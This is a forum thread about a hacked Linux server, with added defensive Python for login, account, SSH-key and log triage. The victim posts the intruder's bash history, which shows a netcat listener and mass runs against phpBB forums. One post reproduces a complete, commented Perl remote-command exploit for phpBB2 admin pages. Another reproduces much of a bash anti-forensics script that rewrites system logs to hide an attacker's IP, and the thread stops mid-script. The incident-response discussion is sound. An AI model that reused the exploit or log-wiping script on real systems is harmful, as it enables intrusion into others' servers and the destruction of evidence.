The Community Forums


Unknown Root Access

Discussion in 'General Discussion' started by viooltje, Jul 20, 2007.

  1. viooltje (Well-Known Member)
    My root access alert suddenly changed from this:

    Root Access ALERT on: Fri Jul 6 02:12:27 CEST 2007 root pts/1 Jul 6 02:12 (a80-126-105-31.adsl.xs4all.nl)

    to this:

    Root Access ALERT on: Sat Jul 21 02:03:49 CEST 2007 cristi pts/0 Jul 19 16:14 (86.55.185.229)

    ??

    Who or what is a cristi?

    Then I tried again and got this:

    Root Access ALERT on: Sat Jul 21 03:33:18 CEST 2007 cristi pts/0 Jul 19 16:14 (86.55.185.229) root pts/2 Jul 21 03:33 (a80-126-105-31.adsl.xs4all.nl)

    Who or what is cristi? A hacker?

    How do I remove this cristi?
     
  2. viooltje (Well-Known Member)
    root@silent [~]# last
    root pts/0 a80-126-105-31.a Sat Jul 21 03:56 still logged in
    root pts/0 a80-126-105-31.a Sat Jul 21 03:46 - 03:53 (00:07)
    root pts/0 a80-126-105-31.a Sat Jul 21 03:43 - 03:46 (00:02)
    root pts/2 a80-126-105-31.a Sat Jul 21 03:37 gone - no logout
    root pts/2 a80-126-105-31.a Sat Jul 21 03:33 - 03:37 (00:04)
    root pts/2 a80-126-105-31.a Sat Jul 21 03:19 - 03:33 (00:13)
    cristi pts/1 86.55.185.229 Fri Jul 20 14:27 - 15:20 (00:53)
    cristi pts/0 86.55.185.229 Thu Jul 19 16:14 - 03:43 (1+11:29)
    cristi pts/0 86.55.185.229 Thu Jul 19 15:52 - 16:10 (00:17)
    cristi pts/0 89.32.42.170 Tue Jul 17 00:22 - 01:57 (01:34)
    cristi pts/1 89.32.42.170 Mon Jul 16 18:19 - 18:50 (00:30)
    cristi pts/0 89.32.42.170 Mon Jul 16 18:17 - 19:11 (00:54)
    cristi pts/0 89.32.42.170 Mon Jul 16 11:24 - 12:02 (00:38)
    root pts/2 a80-126-105-31.a Fri Jul 13 01:53 - 01:54 (00:00)
    root pts/0 a80-126-105-31.a Thu Jul 12 02:58 - 03:11 (00:13)
    cristi pts/0 86.127.243.160 Wed Jul 11 23:57 - 00:08 (00:11)
    cristi pts/0 86.127.243.160 Wed Jul 11 12:05 - 14:29 (02:23)
    cristi pts/3 86.127.243.134 Tue Jul 10 22:22 - 02:54 (04:31)
    cristi pts/3 89.32.42.170 Tue Jul 10 22:12 - 22:13 (00:01)
    cristi pts/3 86.127.243.134 Tue Jul 10 16:58 - 21:09 (04:10)
    cristi pts/3 86.127.243.134 Tue Jul 10 15:01 - 15:22 (00:21)
    root pts/0 a80-126-105-31.a Mon Jul 9 23:41 - 01:39 (01:58)
    reboot system boot 2.6.9-55.0.2.ELs Mon Jul 9 23:39 (11+04:26)
    root pts/1 a80-126-105-31.a Mon Jul 9 22:39 - 22:43 (00:03)
    root pts/1 a80-126-105-58.a Mon Jul 9 19:49 - 20:18 (00:29)
    root pts/0 a80-126-105-58.a Mon Jul 9 19:03 - 19:56 (00:53)
    root pts/0 a80-126-105-31.a Sun Jul 8 03:41 - 04:19 (00:38)
    root pts/1 a80-126-105-31.a Sat Jul 7 00:28 - 00:32 (00:03)
    root pts/1 a80-126-105-31.a Fri Jul 6 02:12 - 02:29 (00:17)
    root pts/0 a80-126-105-31.a Thu Jul 5 01:34 - 02:39 (01:04)
    root pts/0 a80-126-105-31.a Thu Jul 5 01:25 - 01:28 (00:02)
    root pts/0 a80-126-105-31.a Thu Jul 5 00:02 - 01:24 (01:21)
    root pts/0 a80-126-105-31.a Wed Jul 4 22:56 - 23:56 (01:00)
    reboot system boot 2.6.9-55.0.2.ELs Wed Jul 4 22:55 (16+05:10)
    root pts/0 a80-126-105-31.a Tue Jul 3 22:44 - 23:19 (00:34)

    The cristi account has accessed my system.
    How can I find out what this account is doing on my system?
    Is there a command to retrieve the history list of another user?
    Is there a command to see when this account was created?

    Any help would be welcome, thanks a lot.
     
  3. nyjimbo (Well-Known Member, New York)
    :( You have been hacked. What they did will take some time to find out. More than one IP was used, so either there is more than one person or they are using something else to access your system.

    If you can, take the machine offline and start digging. Be sure to isolate any backups from the server so they cannot delete them.

    At the very least, look at the main password files to see if they added accounts and check /home to see if new folders have been made, but you have a ton of other things to check out.
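Added example, not from any poster in this thread. The questions just above (what the account did and when it was created) and the advice to check the password files and /home are the first triage pass. The Python below parses the `last` output posted earlier against an allowlist of admin source addresses, checks constructed /etc/passwd and /etc/shadow excerpts for accounts outside a baseline, a second UID 0 and system accounts with a login shell, and turns the shadow file's last-password-change field into a date, which for a freshly added account that never changed its password is the creation date. The allowlist, the baseline and the passwd/shadow rows are assumptions; the `last` lines are the ones posted above.

```python
import datetime as dt

# `last` output as posted above (`last` truncates hostnames to 16 characters).
LAST_OUTPUT = """\
root pts/0 a80-126-105-31.a Sat Jul 21 03:56 still logged in
root pts/2 a80-126-105-31.a Sat Jul 21 03:37 gone - no logout
cristi pts/1 86.55.185.229 Fri Jul 20 14:27 - 15:20 (00:53)
cristi pts/0 86.55.185.229 Thu Jul 19 16:14 - 03:43 (1+11:29)
cristi pts/0 89.32.42.170 Tue Jul 17 00:22 - 01:57 (01:34)
root pts/1 a80-126-105-31.a Mon Jul 9 22:39 - 22:43 (00:03)
reboot system boot 2.6.9-55.0.2.ELs Mon Jul 9 23:39 (11+04:26)
"""

# Assumption: the only legitimate interactive account is root, logging in from the admin's
# DSL range; prefix matching copes with the truncated hostnames.
EXPECTED_USERS = {"root"}
EXPECTED_HOST_PREFIXES = ("a80-126-105-",)

# Constructed /etc/passwd and /etc/shadow excerpts (not from the thread): one account added
# after the baseline was taken, and a second UID-0 account tucked between system users.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
toor:x:0:0::/:/bin/bash
cristi:x:502:502::/home/cristi:/bin/bash
"""
SHADOW = """\
root:$1$abc$hash:13600:0:99999:7:::
cristi:$1$def$hash:13704:0:99999:7:::
"""
BASELINE_USERS = {"root", "bin", "mysql"}  # assumed snapshot from the known-good install


def parse_last(text):
    """Yield (user, tty, host) per session line, skipping reboot records."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] != "reboot":
            yield parts[0], parts[1], parts[2]


def suspicious_logins(text, users=EXPECTED_USERS, host_prefixes=EXPECTED_HOST_PREFIXES):
    """Sessions whose user or source host falls outside the allowlist."""
    return [(u, t, h) for u, t, h in parse_last(text)
            if u not in users or not h.startswith(host_prefixes)]


def parse_passwd(text):
    rows = {}
    for line in text.splitlines():
        name, _pw, uid, _gid, _gecos, home, shell = line.split(":")
        rows[name] = {"uid": int(uid), "home": home, "shell": shell}
    return rows


def account_findings(passwd_text, baseline=BASELINE_USERS):
    """Accounts not in the baseline, extra UID-0 accounts, and system accounts with a login shell."""
    findings = []
    for name, a in parse_passwd(passwd_text).items():
        if name not in baseline:
            findings.append((name, "not in baseline"))
        if a["uid"] == 0 and name != "root":
            findings.append((name, "second UID 0 account"))
        if 0 < a["uid"] < 500 and a["shell"] not in ("/sbin/nologin", "/bin/false"):
            findings.append((name, "system account with login shell"))
    return findings


def last_password_change(shadow_text, user):
    """Field 3 of /etc/shadow is the last password change in days since 1970-01-01 (what
    `chage -l USER` prints). useradd stamps it at creation, so for an account whose password
    was never changed afterwards it approximates the creation date."""
    for line in shadow_text.splitlines():
        f = line.split(":")
        if f[0] == user and f[2]:
            return dt.date(1970, 1, 1) + dt.timedelta(days=int(f[2]))
    return None


if __name__ == "__main__":
    for hit in suspicious_logins(LAST_OUTPUT):
        print("unexpected session:", *hit)
    for name, why in account_findings(PASSWD):
        print(f"account {name}: {why}")
    print("cristi password set on", last_password_change(SHADOW, "cristi"))
```

For what the account did, the per-user command history is /home/cristi/.bash_history, readable as root, but bash writes it only when the shell exits and the account holder can truncate it at will, so treat it as a hint rather than a record; /var/log/secure holds sshd's side of each session and the ctime of the home directory is another approximation of the creation date.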
     
  4. viooltje (Well-Known Member)
    #1184853141
    cd /lib/fbi
    #1184853259
    ./f www.darkdeed.net/phpBB/
    #1184853607
    cat /home/cristi/.bash_history
    #1184853618
    ./f joeys.clanwar.hu/
    #1184853656
    > /home/cristi/.bash_history
    #1184853659
    ./f joeys.clanwar.hu/
    #1184853664
    cat /home/cristi/.bash_history
    #1184934451
    nc -l -p 8000 -vv
    #1184854460
    cd /lib/fbi
    #1184934308
    ./f www.sandharlanden.net/lan/forum/
    #1184934390
    ./f augu.twbbs.org/phpBB2/
    #1184934691
    ./f augu.twbbs.org/phpBB2/
    #1184934695
    ./f www.japania.org/foorumi/
    #1184934908
    ./f naniwa.starryhometown.net/forum/
    #1184934961
    ./f smallville.andyweb.net/forum/
    #1184935055
    ./f smallville.andyweb.net/forum/
    #1184951957
    netstat -aut
    #1184951970
    ps -ax
    #1184952010
    netatat- ait
    #1184952015
    netstat -aut
    #1184952069
    nice
    #1184954518
    dyweb.net/forum/
    #1184954520
    ./f smallville.andyweb.net/forum/
    #1184954608
    ./f forum.ioche.it/
    #1184954637
    ./f forum.ioche.it/
    #1184954745
    ./f forum.ioche.it/
    #1184954792
    ./f smallville.andyweb.net/forum/
    #1184954876
    ./f smallville.andyweb.net/forum/
    #1184961835
    ./f www.ourtradingclub.com/forum/
    #1184961887
    ./f www.scribbly.net/forum/
    #1184961934
    ./f www.tmetz.net/forums/
    #1184962444
    ./f www.thegrumpystrumpet.com/brassrail/
    #1184962504
    ./f www.jcpbook.com/phpbbX/
    #1184962552
    ./f home.exetel.com.au/getinfo/connect/forum/
    #1184962632
    ./f www.youngrepublicanclub.net/bb/
    #1184985536
    w
    #1184985543
    netstat -aut
    #1184985646
    locate lord
    #1184985652
    cd /home
    #1184985652
    ls
    #1184985656
    cd /var/ww
    #1184985660
    cd /var/www
    #1184985661
    ls
    #1184985664
    cd html
    #1184985664
    ls
    #1184985668
    cd ..
    #1184985669
    cd ..
    #1184985670
    uname -a

    This is what he did. What should I do now?
     
  5. viooltje (Well-Known Member)
    He got a /home/cristi with a dir called .ssh,
    which includes a key:

    61.59.108.23 ssh-dss AAAAB3NzaC1kc3MAAACBAMT8zkopk+Wu+uZRRi0DxUqyN4fbaJ4...................iaOYv0v2jrjyR+iw0/M19Xwb/IsU/7LmHw=

    That's how he got in, I think.

    How lame to hack a cheap, unsecured one-man machine!!
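Added example, not part of the post. One detail worth getting right before drawing conclusions from that line: OpenSSH's authorized_keys entries start with the key type (or with options such as `from="..."`), while known_hosts entries start with a host name or address followed by the key type, which is exactly the `61.59.108.23 ssh-dss AAAA...` layout shown. A known_hosts line therefore records a host the cristi account connected to, not a key that lets someone in; the keys that grant access live in authorized_keys, and those are the files to audit for every account including root. The Python below classifies lines from either file, decodes the key blob, checks that the type named inside the blob matches the declared one, computes the OpenSSH SHA256 fingerprint, and flags authorized keys whose fingerprint is not on a trusted list. All keys and file contents are constructed; the public-key wire format and the fingerprint method are OpenSSH's.

```python
import base64
import hashlib
import struct

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")
# authorized_keys options that carry no "=" sign
FLAG_OPTIONS = {"no-pty", "no-port-forwarding", "no-agent-forwarding", "no-x11-forwarding",
                "no-user-rc", "restrict", "cert-authority", "agent-forwarding",
                "port-forwarding", "pty", "user-rc", "x11-forwarding"}


def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


def _mpint(n):
    # RFC 4251 mpint: big-endian two's complement, so a leading 0x00 when the top bit is set.
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def make_blob(key_type, *ints):
    """Public-key blob in RFC 4253 wire format: type string, then the key's integers.
    Constructed test data: the numbers are far too small for real keys, which is irrelevant
    for parsing and fingerprinting."""
    return _ssh_string(key_type.encode()) + b"".join(_mpint(i) for i in ints)


def blob_type(blob):
    """Every OpenSSH key blob starts with a length-prefixed string naming its algorithm."""
    (n,) = struct.unpack(">I", blob[:4])
    return blob[4:4 + n].decode()


def fingerprint(blob):
    """OpenSSH SHA256 fingerprint: unpadded base64 of SHA-256 over the raw blob."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def _is_option(tok):
    """True for an authorized_keys options token; hashed known_hosts names (|1|...) contain '='
    but are hosts, not options."""
    if tok.startswith("|1|"):
        return False
    return "=" in tok or any(p in FLAG_OPTIONS for p in tok.lower().split(","))


def classify_line(line):
    """known_hosts: `host keytype base64 [comment]`; authorized_keys: `[options] keytype base64
    [comment]`. (@cert-authority / @revoked marker lines are not handled here.)"""
    tokens = line.strip().split()
    if not tokens or tokens[0].startswith("#"):
        return {"kind": "other"}
    if len(tokens) >= 3 and tokens[1] in KEY_TYPES and not _is_option(tokens[0]):
        return {"kind": "known_hosts", "host": tokens[0], "type": tokens[1], "b64": tokens[2]}
    for i, tok in enumerate(tokens):          # options may contain quoted spaces
        if tok in KEY_TYPES and i + 1 < len(tokens):
            return {"kind": "authorized_key", "options": " ".join(tokens[:i]), "type": tok,
                    "b64": tokens[i + 1], "comment": " ".join(tokens[i + 2:])}
    return {"kind": "other"}


def audit(ssh_dir, trusted_fps):
    """Return (path, fingerprint, message) for every entry worth a look."""
    findings = []
    for path, lines in ssh_dir.items():
        for line in lines:
            e = classify_line(line)
            if e["kind"] == "other":
                continue
            blob = base64.b64decode(e["b64"])
            fp = fingerprint(blob)
            if blob_type(blob) != e["type"]:
                findings.append((path, fp, "declared key type does not match blob"))
            if e["kind"] == "known_hosts":
                findings.append((path, fp, f"outbound connection record for host {e['host']}"))
            elif fp not in trusted_fps:
                findings.append((path, fp, f"untrusted authorized key, options={e['options']!r}, "
                                           f"comment={e['comment']!r}"))
    return findings


def b64(blob):
    return base64.b64encode(blob).decode()


# Constructed keys and files (not from the thread).
TRUSTED_BLOB = make_blob("ssh-rsa", 65537, 0xC0FFEE0123456789ABCDEF)
ROGUE_BLOB = make_blob("ssh-rsa", 65537, 0xBADC0DE987654321)
REMOTE_DSS_BLOB = make_blob("ssh-dss", 7, 11, 2, 5)

SAMPLE_SSH_DIR = {
    # same layout as the line quoted in the post: address, key type, base64
    "/home/cristi/.ssh/known_hosts": [f"61.59.108.23 ssh-dss {b64(REMOTE_DSS_BLOB)}"],
    "/root/.ssh/authorized_keys": [
        f"ssh-rsa {b64(TRUSTED_BLOB)} admin@workstation",
        f'from="86.55.185.229" ssh-rsa {b64(ROGUE_BLOB)} cristi',
    ],
}

if __name__ == "__main__":
    for path, fp, msg in audit(SAMPLE_SSH_DIR, {fingerprint(TRUSTED_BLOB)}):
        print(f"{path}: {fp}: {msg}")
```

On a live box, feed it every `authorized_keys` and `authorized_keys2` under /home/*/.ssh and /root/.ssh plus sshd's `AuthorizedKeysFile` setting; a key you do not recognise in root's file is a far stronger statement about how access was obtained than a known_hosts entry in the intruder's own account.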
     
  6. viooltje (Well-Known Member)
    userdel cristi
    userdel: user cristi is currently logged in

    Huh? What now?
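Added example, not from the thread. `userdel` checks utmp and refuses while a login under that name is still recorded, so the order has to be: preserve what you will want later (the home directory with its .bash_history, and the tool directory the history points at), because `userdel -r` deletes the home; lock the account; kill its sessions and any background processes; then delete. The Python below derives that ordered command list from constructed `who` and `ps -eo pid,user,tty,args` output (not the real output from this server); the evidence directory and the /lib/fbi path seen in the history are assumptions. It prints the commands rather than running them, so they can be reviewed first. Removing the account is containment only; the advice elsewhere in this thread to take the machine offline and rebuild still applies.

```python
import shlex

# Constructed `who` and `ps -eo pid,user,tty,args` output (not from the thread): cristi holds a
# shell on pts/0, a netcat listener like the one in his history, and a background perl process.
WHO_OUTPUT = """\
root     pts/1        2007-07-21 03:56 (a80-126-105-31.adsl.xs4all.nl)
cristi   pts/0        2007-07-19 16:14 (86.55.185.229)
"""
PS_OUTPUT = """\
  PID USER     TT       ARGS
    1 root     ?        init [3]
 4021 root     pts/1    -bash
 3877 cristi   pts/0    -bash
 3901 cristi   pts/0    nc -l -p 8000 -vv
 3950 cristi   ?        perl a -u http://forum.example/ -L z3c3v3 -P fbiteam -i 2
"""


def sessions_for(user, who_text):
    """(tty, source host) for each of the account's interactive sessions in `who` output."""
    out = []
    for line in who_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == user:
            host = parts[-1].strip("()") if parts[-1].startswith("(") else ""
            out.append((parts[1], host))
    return out


def pids_for(user, ps_text):
    """(pid, args) for every process the account owns, background ones included."""
    out = []
    for line in ps_text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 3)
        if len(parts) == 4 and parts[1] == user:
            out.append((int(parts[0]), parts[3]))
    return out


def containment_plan(user, who_text, ps_text, evidence_dir="/root/evidence", tool_dir="lib/fbi"):
    """Ordered shell commands: preserve evidence, lock the account, end its sessions and
    processes, then delete. userdel refuses while utmp still shows the user logged in, which is
    why every kill comes before it. evidence_dir and tool_dir are assumptions."""
    q = shlex.quote
    home = f"home/{user}"                          # relative to / for tar -C /
    cmds = [
        f"mkdir -p {q(evidence_dir)}",
        f"tar -C / -cpf {q(evidence_dir + '/' + user + '-home.tar')} {q(home)} {q(tool_dir)}",
        f"passwd -l {q(user)}",                   # lock the password
        f"usermod -s /sbin/nologin {q(user)}",    # and the shell, in case a key still works
    ]
    for tty, _host in sessions_for(user, who_text):
        cmds.append(f"pkill -KILL -t {q(tty)}")   # ends the session that blocks userdel
    for pid, _args in pids_for(user, ps_text):
        cmds.append(f"kill -KILL {pid}")          # listeners and background tools
    cmds.append(f"userdel -r {q(user)}")
    return cmds


if __name__ == "__main__":
    for tty, host in sessions_for("cristi", WHO_OUTPUT):
        print(f"session on {tty} from {host}")
    for pid, args in pids_for("cristi", PS_OUTPUT):
        print(f"pid {pid}: {args}")
    print("\n".join(containment_plan("cristi", WHO_OUTPUT, PS_OUTPUT)))
```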
     
  7. nyjimbo (Well-Known Member, New York)
    Judging from your "last" command he was in several times over the last week or so. Sometimes for over an hour.

    I think he loaded something on port 8000 using netcat to test it first.

    But your list of commands here is likely to only be a small chunk of what he did during all that time.

    You really need to isolate this machine and start digging. Worst case scenario you have to reload the O/S and reload good backups.
     
  8. nyjimbo (Well-Known Member, New York)
    h23-61-59-108.chinup.com.tw is where he most likely resides. Hacking any machine gives them a lot of power; if he truly owns the box he can make it do anything for free, and you get the blame.

    :(
     
  9. viooltje (Well-Known Member)
    Which person or company should I hire to solve this problem?
     
  10. nyjimbo (Well-Known Member, New York)
    If you do not own the machine you might contact your ISP/HOST and they might help you for free, but most likely they will tell you to reload the O/S and the backups of everything.

    However, when that's done you will be back to the point right before you got hacked, so you would need to find out what let them in.
     
  11. verdon (Well-Known Member, Northern Ontario, Canada)
    I too think you should start fresh. That's just based on reading these forums for a couple of years. I only have experience with configserver.com (user chirpy here) for paid services of the sort you need, and have been very happy with them. I'm sure there are other users here that are good too, but I can only personally recommend them.

    Good luck.
     
  12. viooltje (Well-Known Member)
    How can I know if he really gained root access?
     
  13. Infopro (cPanel Sr. Product Evangelist, Staff Member)
    Click a few of the links in your post above. Those sites look hacked to me. Your server has been compromised. Time for a reload. All hope is lost on this one I believe.

    Got backups?

    Good luck. :(
     
  14. Infopro (cPanel Sr. Product Evangelist, Staff Member)
    One more tip, you might want to move all of these forums over to something a bit more secure like SMF forums. phpbb is like a screendoor on a submarine.
     
  15. lehels (Well-Known Member)
    Someone who "speaks" the Unix language:

    Don't forget a firewall!
    Change the usual SSH port.

    Keep an eye on your intruder; precisely deny all unwanted access.

    Good luck,
     
  16. viooltje (Well-Known Member)
    What does this do:
    ./f www.darkdeed.net/phpBB/

    He is using this code in the f file:
    perl a -u http://$1 -L z3c3v3 -P fbiteam -i 2


    and a lot of scripts containing this code:

    #!/usr/bin/perl
    # r57 phpBB2 "admin2exec" exploit as found on the server: logs in to the target forum with
    # an administrator account, abuses the admin database-restore feature to run an UPDATE on
    # the users table, then reads command output back from the profile editor page.

    use LWP::UserAgent;
    use Getopt::Std;
    use HTTP::Cookies;

    # -u forum URL  -L admin login  -P password  -i user_id  -p table prefix  -o proxy
    getopts("u:L:P:i:p:o:");

    $url      = $opt_u;
    $login    = $opt_L;
    $password = $opt_P;
    $id       = $opt_i || 2;
    $prefix   = $opt_p || 'phpbb_';
    $proxy    = $opt_o;

    if (!$url || !$login || !$password) { &usage; }

    $|++;

    $xpl        = LWP::UserAgent->new() or die;
    $cookie_jar = HTTP::Cookies->new();
    $xpl->cookie_jar($cookie_jar);
    $xpl->proxy('http' => 'http://' . $proxy) if $proxy;

    # Every request carries this User-Agent; it leaks the target, login, password, user_id and prefix.
    $ids = 'IDS:r57 phpBB2 exploit a2e2#20022006|' . $url . '|' . $login . '|' . $password . '|' . $id . '|' . $prefix;

    # Log in as the forum administrator and keep the session id from the cookie.
    $res = $xpl->post(
        $url . 'login.php',
        [
            "username"  => "$login",
            "password"  => "$password",
            "autologin" => "on",
            "admin"     => "1",
            "login"     => "Log in",
        ],
        "User-Agent" => "$ids"
    );
    $cookie_jar->extract_cookies($res);
    if ($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }

    # Interactive loop: read a command, run it through the forum, print what came back.
    while () {
        print "by Alexander for FbiTeam\n";
        print "Command for execute or 'exit' for exit # ";
        while (<STDIN>) {
            $cmd = $_;
            chomp($cmd);
            exit() if ($cmd eq 'exit');
            last;
        }
        &run($cmd);
    }

    sub run($) {
        # bbcode_uid is interpolated into a preg_replace() pattern when the signature is rendered;
        # the value "(.+)/e\0" supplies the /e (evaluate) modifier and a NUL, so the backtick
        # command placed in user_sig runs and its output lands between the _START_/_END_ markers.
        $sql = "UPDATE " . $prefix . "users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && " . $_[0] . " && echo _END_`' WHERE user_id=" . $id . ";";
        &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid", $sql);
        $res    = $xpl->get($url . 'profile.php?mode=editprofile&sid=' . $sid, "User-Agent" => "$ids");
        @result = split(/\n/, $res->content);
        $data = '';
        $on = $start = $end = 0;
        for (@result) {
            if (/_END_/)   { $end = 1; last; }
            if ($on)       { $data .= $_ . "\n"; }
            if (/_START_/) { $on = 1; $start = 1; }
        }
        if ($start && $end) { print $data . "\r\n"; }
    }

    # The admin "restore backup" action executes whatever SQL is in the uploaded file.
    sub phpbb_sql_query($$) {
        $res = $xpl->post(
            "$_[0]",
            Content_type => 'form-data',
            Content      => [
                perform       => 'restore',
                restore_start => 'Start Restore',
                backup_file   => [
                    undef,
                    '0wneeeeedddd',
                    Content_type => 'text/plain',
                    Content      => "$_[1]",
                ],
            ],
            "User-Agent" => "$ids"
        );
    }

    sub usage() {
        print "\\=--------------------------------------=/\r\n";
        print "| phpBB admin2exec exploit by Alexander |\r\n";
        print "| version 2 (user_sig_bbcode_uid) |\r\n";
        print "/=--------------------------------------=\\\r\n";
        print "\r\n Usage: a [OPTIONS]\r\n\r\n";
        print " Options:\r\n";
        print " -u - path to forum e.g. http://site/f...)\r\n";
        exit();
    }

    ??? A phpBB hacker?
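Added example, not from the thread. The script above describes itself: it logs in to the target forum as an administrator (`admin=1` on login.php), pushes a SQL UPDATE through the admin backup-restore handler `admin/admin_db_utilities.php`, then fetches `profile.php?mode=editprofile` to read the command output between `_START_` and `_END_`. Every request carries a User-Agent beginning `IDS:r57 phpBB2 exploit`, followed by the target URL, admin login, password, user_id and table prefix. That gives a forum operator three checks, which the Python below runs over a constructed access_log excerpt and constructed phpbb_users rows: the User-Agent string itself; the behavioural pair of a POST to admin_db_utilities.php followed within a minute by a GET of the profile editor from the same address, which still fires if the attacker edits the User-Agent; and, in the database, a `user_sig_bbcode_uid` that is not the plain 10-character hex token phpBB 2 generates, or a `user_sig` containing backticks. Log lines, addresses, session ids and table rows are all constructed.

```python
import re
from datetime import datetime

# Apache combined log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')

# The User-Agent the exploit sets on every request (taken from its source above).
EXPLOIT_UA_PREFIX = "IDS:r57 phpBB2 exploit"

# Constructed access_log excerpt (not from the thread): one run of the exploit, plus an
# administrator doing a legitimate restore a few minutes later.
UA = "IDS:r57 phpBB2 exploit a2e2#20022006|http://forum.example/forum/|z3c3v3|fbiteam|2|phpbb_"
ACCESS_LOG = f"""\
10.0.0.5 - - [20/Jul/2007:14:31:02 +0200] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
86.55.185.229 - - [20/Jul/2007:14:31:40 +0200] "POST /forum/login.php HTTP/1.1" 302 0 "-" "{UA}"
86.55.185.229 - - [20/Jul/2007:14:31:41 +0200] "POST /forum/admin/admin_db_utilities.php?sid=0123456789abcdef0123456789abcdef HTTP/1.1" 200 2210 "-" "{UA}"
86.55.185.229 - - [20/Jul/2007:14:31:42 +0200] "GET /forum/profile.php?mode=editprofile&sid=0123456789abcdef0123456789abcdef HTTP/1.1" 200 9100 "-" "{UA}"
10.0.0.7 - - [20/Jul/2007:14:40:00 +0200] "POST /forum/admin/admin_db_utilities.php?sid=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1" 200 2210 "http://forum.example/forum/admin/" "Mozilla/5.0"
"""


def parse_log(text):
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            r = m.groupdict()
            r["ts"] = datetime.strptime(r["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield r


def exploit_ua_hits(text):
    """Requests carrying the exploit's self-identifying User-Agent. Its pipe-separated tail
    leaks the forum URL, admin login, password, user_id and table prefix it was run with."""
    hits = []
    for r in parse_log(text):
        if r["ua"].startswith(EXPLOIT_UA_PREFIX):
            fields = r["ua"].split("|")
            hits.append({"ip": r["ip"], "path": r["path"],
                         "login": fields[2] if len(fields) > 2 else ""})
    return hits


def restore_then_profile(text, window_s=60):
    """Behavioural signature independent of the User-Agent: a POST to admin/admin_db_utilities.php
    followed within window_s seconds by a GET of profile.php?mode=editprofile from the same
    address, i.e. the exploit's write-SQL-then-read-output pair."""
    by_ip = {}
    for r in parse_log(text):
        by_ip.setdefault(r["ip"], []).append(r)
    hits = []
    for ip, reqs in by_ip.items():
        for i, r in enumerate(reqs):
            if r["method"] != "POST" or "admin/admin_db_utilities.php" not in r["path"]:
                continue
            for nxt in reqs[i + 1:]:
                gap = (nxt["ts"] - r["ts"]).total_seconds()
                if gap > window_s:
                    break
                if nxt["method"] == "GET" and "profile.php?mode=editprofile" in nxt["path"]:
                    hits.append((ip, r["ts"].isoformat()))
                    break
    return hits


# Constructed phpbb_users rows: (user_id, user_sig_bbcode_uid, user_sig). phpBB 2 generates
# bbcode_uid as a 10-character hex token; the exploit writes a regex with /e and a NUL instead.
USERS_ROWS = [
    (2, "(.+)/e\x00", "blah:`echo _START_ && uname -a && echo _END_`"),
    (3, "1a2b3c4d5e", "Moderator signature"),
    (15, "f00dbabe12", "Just a user"),
]


def tampered_signatures(rows):
    """user_ids whose bbcode_uid is not a plain token or whose signature carries shell backticks."""
    token = re.compile(r"^[0-9a-f]{10}$")
    return [uid for uid, bb, sig in rows if not token.match(bb) or "`" in sig or "_START_" in sig]


if __name__ == "__main__":
    print("UA hits:", exploit_ua_hits(ACCESS_LOG))
    print("restore/profile pairs:", restore_then_profile(ACCESS_LOG))
    print("tampered signatures:", tampered_signatures(USERS_ROWS))
```

The first check costs one grep and catches this particular tool; the second is the one worth keeping in a detection rule, because no legitimate admin restores a database backup and then opens their own profile editor a second later. The database check is the one to run on a forum that was actually hit, since the planted signature survives in the users table after the logs are gone.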
     
  17. nyjimbo (Well-Known Member, New York)
    At least. I mean he has full access to your computer so for now he is launching phpbb exploit attacks. Given enough time he will turn your machine into a super hacking server.
     
  18. viooltje (Well-Known Member)
    Hacked, and more found: zxc-Antilog c0ded By [ Alexander ] (WhiteHat.ro)

    Can't find anything on Google or in the forums. Does someone know something about this stuff?

    Found this in the 'anti.pdf' file:

    #!/bin/bash
    #
    # zxc-Antilog V 0.1
    #
    # usage : to Exchanging your IP with fake IP at your choice
    #
    # and to clear your last command's and clear logout history
    #
    # Remember that...
    #
    # Whitehat 2006
    #
    #
    clear
    echo "--------------------------------------------------------------------------------------------------------------------"
    echo " zxc-Antilog c0ded By [ Alexander ] (WhiteHat.ro) - zxcpoi@WhiteHat.ro "
    echo "--------------------------------------------------------------------------------------------------------------------"
    # The root check only prints a message; the script carries on either way.
    if [ "$UID" = "0" ]; then
        echo " h3re w3 g0 "
    else
        echo " `whoami` y0 must be login by root"
    fi
    echo -n " What's the ip y0 want to spoof it ? "
    read word
    word=$word
    echo -n " What's the Fake ip y0 want using it ? "
    read fake
    fake=$fake
    # Each block below rewrites one log with sed, swapping the real address for the fake one.
    # The same text substitution is applied to the binary files lastlog, wtmp and utmp.
    r0x="yes"
    if [ ! -f /var/log/lastlog ]; then
        r0x="no"
        echo " i can't find lastlog"
    fi
    if [ "$r0x" = "yes" ]; then
        echo " Editing lastlog"
        sed "s/$word/$fake/g" /var/log/lastlog > /var/log/lastlog.new
        mv /var/log/lastlog.new /var/log/lastlog
    fi
    syslog="yes"
    if [ ! -f /var/log/syslog ]; then
        echo " i can't find syslog"
        syslog="no"
    fi
    if [ "$syslog" = "yes" ]; then
        echo " Editing syslog"
        sed "s/$word/$fake/g" /var/log/syslog > /var/log/syslog.new
        mv /var/log/syslog.new /var/log/syslog
    fi
    mess="yes"
    if [ ! -f /var/log/messages ]; then
        echo " i can't find message "
        mess="no"
    fi
    if [ "$mess" = "yes" ]; then
        echo " Editing message"
